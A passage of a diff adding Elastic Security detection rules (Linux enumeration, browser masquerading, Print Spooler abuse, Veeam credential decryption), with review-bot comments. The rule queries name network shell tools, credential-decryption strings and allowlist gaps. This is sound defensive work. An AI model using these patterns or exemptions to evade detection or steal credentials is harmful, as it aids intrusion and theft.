Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json new file mode 100644 index 00000000000..db599c813ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json 
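Review bot: The `description` misspells "laterally" as `latteraly`; the same text is repeated verbatim in the `_5` revision in the next hunk, so both should be fixed together. Inside the commented-out tuning block in `query`, `nc.traditional\"` is missing its opening `\"`; the `/* */` wrapper keeps the live query parseable, but anyone who uncomments the block will hit a syntax error, so it should read `\"nc.traditional\"`. The `_4` and `_5` revisions otherwise differ only in the order of the `event.action` and `event.type` clauses, which is worth one line in the commit description if that reorder is the intended change.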
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\" and \nnot process.args == \"--tty-only\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic 
Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json new file mode 100644 index 00000000000..294a96780e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Browser Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n /* Chrome Related Processes */\n (process.name : (\n \"chrome.exe\", \"GoogleUpdate.exe\", \"GoogleCrashHandler64.exe\", \"GoogleCrashHandler.exe\",\n \"GoogleUpdateComRegisterShell64.exe\", \"GoogleUpdateSetup.exe\", \"GoogleUpdateOnDemand.exe\",\n \"chrome_proxy.exe\", \"remote_assistance_host.exe\", \"remoting_native_messaging_host.exe\",\n \"GoogleUpdateBroker.exe\"\n ) and not\n (process.code_signature.subject_name : (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n and not\n (\n process.executable : (\n \"?:\\\\Program Files\\\\HP\\\\Sure Click\\\\servers\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\HP\\\\Sure Click\\\\*\\\\servers\\\\chrome.exe\"\n ) and\n process.code_signature.subject_name : (\"Bromium, Inc.\") and process.code_signature.trusted == true\n ) and not\n (\n process.executable : (\n \"?:\\\\Program Files\\\\dynatrace\\\\synthetic\\\\Chrome-bin\\\\chrome.exe\"\n ) and\n process.code_signature.subject_name : (\"Dynatrace LLC\") and process.code_signature.trusted == true\n ) and\n not (\n process.executable : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\ms-playwright\\\\chromium-*\\\\chrome-win\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\synthetics-recorder\\\\resources\\\\local-browsers\\\\chromium-*\\\\chrome-win\\\\chrome.exe\",\n 
\"*\\\\node_modules\\\\puppeteer\\\\.local-chromium\\\\win64-*\\\\chrome-win\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Invicti Professional Edition\\\\chromium\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\End2End, Inc\\\\ARMS Html Engine\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\*BurpSuitePro\\\\burpbrowser\\\\*\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*BurpSuite\\\\burpbrowser\\\\*\\\\chrome.exe\"\n ) and process.args: (\n \"--enable-features=NetworkService,NetworkServiceInProcess\",\n \"--type=crashpad-handler\", \"--enable-automation\", \"--disable-xss-auditor\"\n )\n )\n ) or\n\n /* MS Edge Related Processes */\n (process.name : (\n \"msedge.exe\", \"MicrosoftEdgeUpdate.exe\", \"identity_helper.exe\", \"msedgewebview2.exe\",\n \"MicrosoftEdgeWebview2Setup.exe\", \"MicrosoftEdge_X*.exe\", \"msedge_proxy.exe\",\n \"MicrosoftEdgeUpdateCore.exe\", \"MicrosoftEdgeUpdateBroker.exe\", \"MicrosoftEdgeUpdateSetup_X*.exe\",\n \"MicrosoftEdgeUpdateComRegisterShell64.exe\", \"msedgerecovery.exe\", \"MicrosoftEdgeUpdateSetup.exe\"\n ) and not\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n and not\n (\n process.name : \"msedgewebview2.exe\" and\n process.code_signature.subject_name : (\"Bromium, Inc.\", \"Amazon.com Services LLC\") and process.code_signature.trusted == true\n )\n ) or\n\n /* Brave Related Processes */\n (process.name : (\n \"brave.exe\", \"BraveUpdate.exe\", \"BraveCrashHandler64.exe\", \"BraveCrashHandler.exe\",\n \"BraveUpdateOnDemand.exe\", \"brave_vpn_helper.exe\", \"BraveUpdateSetup*.exe\",\n \"BraveUpdateComRegisterShell64.exe\"\n ) and not\n (process.code_signature.subject_name : \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Firefox Related Processes */\n (process.name : (\n \"firefox.exe\", \"pingsender.exe\", \"default-browser-agent.exe\", \"maintenanceservice.exe\",\n \"plugin-container.exe\", 
\"maintenanceservice_tmp.exe\", \"maintenanceservice_installer.exe\",\n \"minidump-analyzer.exe\"\n ) and not\n (process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true)\n and not\n (\n process.name : \"default-browser-agent.exe\" and\n process.code_signature.subject_name : (\"WATERFOX LIMITED\") and process.code_signature.trusted == true\n )\n ) or\n\n /* Island Related Processes */\n (process.name : (\n \"Island.exe\", \"IslandUpdate.exe\", \"IslandCrashHandler.exe\", \"IslandCrashHandler64.exe\",\n \"IslandUpdateBroker.exe\", \"IslandUpdateOnDemand.exe\", \"IslandUpdateComRegisterShell64.exe\",\n \"IslandUpdateSetup.exe\"\n ) and not\n (process.code_signature.subject_name : \"Island Technology Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Opera Related Processes */\n (process.name : (\n \"opera.exe\", \"opera_*.exe\", \"browser_assistant.exe\"\n ) and not\n (process.code_signature.subject_name : (\"Opera Norway AS\", \"Opera Software AS\") and process.code_signature.trusted == true)\n ) or\n\n /* Whale Related Processes */\n (process.name : (\n \"whale.exe\", \"whale_update.exe\", \"wusvc.exe\"\n ) and not\n (process.code_signature.subject_name : \"NAVER Corp.\" and process.code_signature.trusted == true)\n ) or\n\n /* Chromium-based Browsers processes */\n (process.name : (\n \"chrmstp.exe\", \"notification_helper.exe\", \"elevation_service.exe\"\n ) and not\n (process.code_signature.subject_name : (\n \"Island Technology Inc.\",\n \"Citrix Systems, Inc.\",\n \"Brave Software, Inc.\",\n \"Google LLC\",\n \"Google Inc\",\n \"Microsoft Corporation\",\n \"NAVER Corp.\",\n \"AVG Technologies USA, LLC\",\n \"Avast Software s.r.o.\",\n \"PIRIFORM SOFTWARE LIMITED\",\n \"NortonLifeLock Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b9eb30f-87d6-45f4-9289-2bf2024f0376", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "5b9eb30f-87d6-45f4-9289-2bf2024f0376_3", + "type": "security-rule" +} \ No newline at end of file 
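Review bot: The Chrome branch of `query` exempts unsigned `chrome.exe` under user-writable locations such as `?:\\Users\\*\\AppData\\Local\\ms-playwright\\*` and `*\\node_modules\\puppeteer\\*` whenever one of four common automation arguments is present, and nothing in the JSON says this trade-off was deliberate. A short `note` field stating that these entries cover unsigned test-automation browser builds, and that the argument condition is the only discriminator for them, would let a tuner judge the gap instead of guessing. `required_fields` otherwise lists exactly the fields the query references.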
diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json
new file mode 100644
index 00000000000..e426a4fdffc
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PrintSpooler Service Executable File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"spoolsv.exe\" and file.extension : \"dll\" and\n file.path : (\"?:\\\\Windows\\\\System32\\\\*\", \"?:\\\\Windows\\\\SysWOW64\\\\*\") and\n not file.path : (\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\sysWOW64\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\W32X86\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\PRTPROCS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\{????????-????-????-????-????????????}\\\\*.dll\"\n )\n", + "references": [ + "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", + "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json new file mode 100644 index 00000000000..ffb6a9d144c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json 
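Review bot: The allowlist in `query` excludes `?:\\WINDOWS\\system32\\x5lrs.dll` and its SysWOW64 twin by file name alone, and neither `description` nor a `note` field records where that exclusion comes from, so a reviewer cannot tell whether it is still warranted; a one-line `note` naming the software that ships `x5lrs.dll` would make the exclusion auditable. The same applies to the `_108` revision in the next hunk, which differs from this one only by narrowing `index` from `logs-endpoint.events.*` to `logs-endpoint.events.file-*`. That narrowing fits a `file where` query and could be mentioned in the commit description as the reason for the new revision.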
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PrintSpooler Service Executable File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"spoolsv.exe\" and file.extension : \"dll\" and\n file.path : (\"?:\\\\Windows\\\\System32\\\\*\", \"?:\\\\Windows\\\\SysWOW64\\\\*\") and\n not file.path : (\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\sysWOW64\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\W32X86\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\PRTPROCS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\{????????-????-????-????-????????????}\\\\*.dll\"\n )\n", + "references": [ + "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", + "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json b/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json new file mode 100644 index 00000000000..a004aa2e041 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies recursive process capability enumeration of the entire filesystem through the getcap command. Malicious users may manipulate identified capabilities to gain root privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Capability Enumeration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"getcap\" and process.args == \"-r\" and process.args == \"/\" and process.args_count == 3 and\nuser.id != \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5c351f54-4187-4ad8-abc8-29b0cfbef8b1", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json b/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json new file mode 100644 index 00000000000..ec3b429d5c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json 
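Review bot: The `threat` mapping uses T1057 Process Discovery, but the query matches `getcap -r /`, which enumerates file capabilities across the filesystem rather than running processes; T1083 File and Directory Discovery, already used by the SUID/SGID rule earlier in this diff, looks like the closer fit, though that should be confirmed against the upstream rule before changing it. The `setup` string opens with `## Setup\n\n\nThis rule`, one blank line more than the sibling rules, which renders as an extra gap in Kibana. This rule filters on `user.id != "0"` while the SUID/SGID rule excludes on `user.Ext.real.id`; a short `note` on why the effective rather than real uid is used here would help tuners keep the two consistent.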
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that can access and decrypt Veeam credentials stored in MSSQL databases. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Veeam Credential Access Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"[dbo].[Credentials]\" and\n (\"Veeam\" or \"VeeamBackup\")\n ) or\n \"ProtectedStorage]::GetLocalString\"\n )\n", + "references": [ + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://www.crowdstrike.com/blog/anatomy-of-alpha-spider-ransomware/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5c602cba-ae00-4488-845d-24de2b6d8055", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Credential Access", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "5c602cba-ae00-4488-845d-24de2b6d8055_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json new file mode 100644 index 00000000000..a4d59dab357 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_10.json 
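Review bot: The rule ships without a `note` (triage and false-positive guidance) and without the `Resources: Investigation Guide` tag that the sibling rules in this change carry, even though its match terms — `[dbo].[Credentials]` together with `Veeam`/`VeeamBackup`, or `ProtectedStorage]::GetLocalString` — are exactly what a backup administrator's own maintenance or migration script on a Veeam Backup & Replication server would contain. A short note should tell the analyst to confirm whether the host is the Veeam backup server and whether the account running PowerShell is the backup service/admin account, and, if the script was not expected, to treat every credential stored in the Veeam database as compromised and rotate it, since the description itself ties this activity to ransomware preparation. The `setup` text covers only Script Block Logging; it would help to add that `powershell.file.script_block_text` presumably comes from the PowerShell Operational log (event 4104) collected by the Windows integration, so the `logs-windows.powershell*` index only carries data when that log is enabled in the integration.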
